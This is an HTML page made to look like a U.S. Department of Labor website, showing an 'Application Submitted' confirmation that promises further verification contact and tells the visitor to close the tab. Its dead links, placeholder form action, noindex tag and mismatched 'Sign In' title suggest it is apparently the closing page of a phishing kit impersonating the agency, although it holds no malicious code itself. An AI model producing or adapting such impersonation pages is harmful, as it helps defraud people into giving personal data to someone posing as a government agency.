<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml" lang="en-US">
<head>
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
    <meta http-equiv="Cache-Control" content="private, no-cache, no-store, must-revalidate">
    <meta http-equiv="Pragma" content="no-cache"> 
    <meta http-equiv="Expires" content="-1">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <meta name="robots" content="noindex,nofollow">
    <title>Sign In</title>
    <link rel="shortcut icon" href="favicon.ico">
    <link href="css/bootstrap.min.css" rel="stylesheet">
    <link href="css/font.css" rel="stylesheet">
    <link href="css/styles.css" rel="stylesheet">
    <link href="css/application.css" rel="stylesheet">
    <script async="" src="https://www.google-analytics.com/analytics.js"></script>
    <script src="css/jquery-3.5.1.min.js"></script>
    <script src="js/bootstrap.min.js"></script>
</head>
<body class="bg-white">
	<header>
        <div id="banner" role="banner" alt="banner">
            <section class="usa-banner" aria-label="Official government website">
                <div class="usa-accordion">
                    <header>
                        <div id="bannerOuter">
                            <div id="bannerInner" class="container">
                                <div class="bannerRow">
                                    <img src="images/official-site-flag.png" class="official-site-flag mr-2" alt="US Flag">
                                        <div class="bannerText fill">An official website of the United States Government</div>
                                </div>
                            
                                <div class="bannerRow">
                                    <div id="flagEqualizer"></div>
                                        <div class="bannerText fill">
                                            <a id="aExpandHeaderBar" href="#" alt="Expand &quot;Here's how you know&quot;">
                                                <span>Here's how you know</span>
                                                <img id="aExpandHeaderArrow" src="images/arrow-down.svg" alt="" aria-label="" width="10px" padding="0" border="0" data-isexpanded="false">
                                            </a>
                                        </div>
                                    </div>
                                </div>
                            </div>
                    </header>
                </div>
            </section>
        </div>
        <nav id="nav" class="sadi-header mb-3">
            <div id="navbarText" class="container sadi-header py-0 my-0">
                <div class="sadi-header py-0 my-0 mr-2 sadi-header-flex-left">
                    <img src="images/logo-primary.svg" class="mr-3 sadi-header-logo" alt="Department of Labor"><span style="font-size: 20px; font-weight: 600; margin-left: -20px;">U.S. Department of Labor</span>
                </div>
            </div>
        </nav>
    </header>
    <div id="main">
            <div class="page-container" data-role="page-container">
                <div class="container">
                    <div class="content-container">
                        <form class="new_user" id="new_user" action="#" accept-charset="UTF-8" method="post">
                            <main aria-labelledby="sr_page_title" class="form-container">
                                <div class="form-header-access"><h1 id="sr_page_title">Application Submitted</h1></div>
                                <div class="form-fields">
                                    <div class="field-group">
                                        <center><br><br><?xml version="1.0" encoding="utf-8"?><svg version="1.1" width="70" id="Layer_1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" x="0px" y="0px" viewBox="0 0 117.72 117.72" style="enable-background:new 0 0 117.72 117.72" xml:space="preserve"><style type="text/css"><![CDATA[
                                            .st0{fill:rgb(24, 130, 230);}
                                        ]]></style><g><path class="st0" d="M58.86,0c9.13,0,17.77,2.08,25.49,5.79c-3.16,2.5-6.09,4.9-8.82,7.21c-5.2-1.89-10.81-2.92-16.66-2.92 c-13.47,0-25.67,5.46-34.49,14.29c-8.83,8.83-14.29,21.02-14.29,34.49c0,13.47,5.46,25.66,14.29,34.49 c8.83,8.83,21.02,14.29,34.49,14.29s25.67-5.46,34.49-14.29c8.83-8.83,14.29-21.02,14.29-34.49c0-3.2-0.31-6.34-0.9-9.37 c2.53-3.3,5.12-6.59,7.77-9.85c2.08,6.02,3.21,12.49,3.21,19.22c0,16.25-6.59,30.97-17.24,41.62 c-10.65,10.65-25.37,17.24-41.62,17.24c-16.25,0-30.97-6.59-41.62-17.24C6.59,89.83,0,75.11,0,58.86 c0-16.25,6.59-30.97,17.24-41.62S42.61,0,58.86,0L58.86,0z M31.44,49.19L45.8,49l1.07,0.28c2.9,1.67,5.63,3.58,8.18,5.74 c1.84,1.56,3.6,3.26,5.27,5.1c5.15-8.29,10.64-15.9,16.44-22.9c6.35-7.67,13.09-14.63,20.17-20.98l1.4-0.54H114l-3.16,3.51 C101.13,30,92.32,41.15,84.36,52.65C76.4,64.16,69.28,76.04,62.95,88.27l-1.97,3.8l-1.81-3.87c-3.34-7.17-7.34-13.75-12.11-19.63 c-4.77-5.88-10.32-11.1-16.79-15.54L31.44,49.19L31.44,49.19z"/></g></svg><p></p>
                                        <br><p style="color:rgb(0, 75, 133);">We have received your application for processing. Our Agency will contact you for further verification. Thanks.</p><br><br><br><p style="font-size: 13px;">Please close the tab</p></center>

                                    </div>
                                </div>
                            </main>
                        </form>
                    </div>
                </div>
            </div>
        </div>
        <footer class="footer sadi-footer" style="position: fixed; bottom: 0; width: 100%">
        <div class="container flex sadi-footer-position">
            <div class="grid-row grid-gap-lg">
                <div>
                    <a href="#"><img id="footerLogo" style="padding-top: 10px;" src="images/logo-primary.svg" height="35px" padding="0" border="0" alt="U.S. Department of Labor"></a>
                    <span style="font-size: 16px; margin-left: -10px; font-weight: 600; color: white;">U.S. Department of Labor</span>
                </div>
                <div class="footer-links-position">
                    <span class="text-white">
                        <a href="#" class="text-white mr-2">Privacy Policy</a>|
                    </span>
                    <span class="text-white">
                        <a href="#" class="text-white ml-2">Accessibility</a>
                    </span>
                </div>
            </div>
        </div>
    </footer>
</body>
</html>